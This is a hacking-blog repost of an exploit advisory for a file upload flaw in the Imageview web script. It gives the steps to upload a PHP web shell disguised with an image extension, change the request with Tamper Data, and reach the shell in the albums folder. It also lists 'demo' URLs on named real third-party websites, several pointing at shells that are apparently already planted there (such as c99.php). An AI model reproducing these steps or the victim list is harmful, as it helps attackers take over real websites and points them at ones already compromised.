Select Menu

Ads

Random Posts

Black-Ink. Diberdayakan oleh Blogger.

Metasploit

Web Pentest

Circle Gallery

" });

Our Chanel

Tutorial

Tools

» » Imageview File Upload vulnerability

Posted by: Black-Ink Posted date: 13.10 / comment : 0 





[+] Author: TUNISIAN CYBER
[+] Exploit Title: Imageview File Upload vulnerability
[+] Date: 20-01-2014
[+] Category: WebApp
[+] Google Dork: :
[+] Tested on: KaliLinux
[+] Friendly Sites: na3il.com,th3-creative.com
#############################################################
+Exploit:
Imageview Suffers from a File Upload Vulnerability which allows the attacker
to upload a PHP File.

+P.O.C:
127.0.0.1/[PATH]/upload.php
Upload as shell.php.[img extension jpg png gif]
Change it using temper data
Shell Path:
127.0.0.1/[PATH]/albums/shell.php

+Demo:
http://indianayouthballet.com/photos/upload.php
http://indianayouthballet.com/photos/albums/a0a0a.php
http://www.schaefer-swantow.de/Galerie/upload.php
http://www.schaefer-swantow.de/Galerie/albums/c99.php
http://www.rappel-zappel.de/galerie/upload.php

+Fix:
There's no fix from the script's owner but change "upload.php"'s name or path.

Tagged with:

About Black-Ink

WePress Theme is officially developed by Templatezy Team. We published High quality Blogger Templates with Awesome Design for blogspot lovers.The very first Blogger Templates Company where you will find Responsive Design Templates.
«
Next
Posting Lebih Baru
»
Previous
Posting Lama

Tidak ada komentar

Leave a Reply

Biakan Jadi Pembaca Yang Tau berterima kasih .... :D
Meski hanya dengan menulis kata Terima kasih ...

Langganan: Posting Komentar (Atom)

Copyright © 2014 Blogger Templates Designed By: Templatezy